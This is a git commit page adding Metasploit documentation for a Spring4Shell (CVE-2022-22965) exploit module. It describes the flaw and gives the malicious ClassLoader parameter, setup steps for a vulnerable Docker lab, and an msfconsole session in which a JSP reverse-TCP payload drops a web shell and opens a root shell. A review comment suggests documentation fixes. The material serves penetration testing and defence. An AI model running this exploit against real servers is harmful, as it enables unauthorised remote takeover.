Finish exploit CVE-2022-22965

vleminator
2022-04-07 15:22:18 +02:00
parent 619661a845
commit 4e6176d9ca
2 changed files with 359 additions and 0 deletions
@@ -0,0 +1,73 @@
## Vulnerable Application
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above
and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable
to remote code execution due to an unsafe data binding used to populate an object from request parameters
to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the
org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can
gain remote code execution.
## Verification Steps
1. Build the application
1. `git clone https://github.com/vleminator/Spring4Shell-POC`
2. `docker build . -t spring4shell`
2. Run the application
1. `docker run -p 8085:8080 spring4shell`
3. Start msfconsole
4. Run: `use exploit/multi/http/spring4shell`
5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
6. Run the exploit
## Options
## Scenarios
### Spring Framework v5.3.15 on Linux (debian docker image)
```
msf6 exploit(multi/http/spring4shell) > show options
Module options (exploit/multi/http/spring4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEDROPPERDIR /tmp/ no The directory used for filedropper (only applicable to non-Java target)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8085 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /helloworld/greeting yes The path to the application action
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.174 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Java
msf6 exploit(multi/http/spring4shell) > exploit
[*] Started reverse TCP handler on 192.168.0.174:4444
[*] 127.0.0.1:8085 - Generating JSP...
[*] 127.0.0.1:8085 - Modifying Class Loader...
[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/lKNWl49.jsp
[!] Tried to delete lKNWl49.jsp, unknown result
[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:56430 ) at 2022-04-07 14:45:06 +0200
whoami
root
```
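Review bot: the `## Options` section of the new documentation file is empty, yet the `show options` output below it lists module-specific settings (`FILEDROPPERDIR`, `TARGETURI`) that a user needs explained; add a short entry for each under `## Options`, for example `FILEDROPPERDIR` (directory used by the file dropper on non-Java targets, default `/tmp/`) and `TARGETURI` (path to the vulnerable application action, here `/helloworld/greeting`). Two smaller points in the same file: the sub-steps under "Build the application" and "Run the application" in `## Verification Steps` restart their numbering at 1 without indentation, so Markdown will render them as one flat, renumbered list; indent them under their parent items. And because the scenario output shows `[!] Tried to delete lKNWl49.jsp, unknown result`, the scenario text should state that the generated JSP may remain in the application's web root and that the AccessLogValve pattern, suffix and directory settings are changed on the target, so operators know what to clean up afterwards and defenders know which artifacts indicate exploitation.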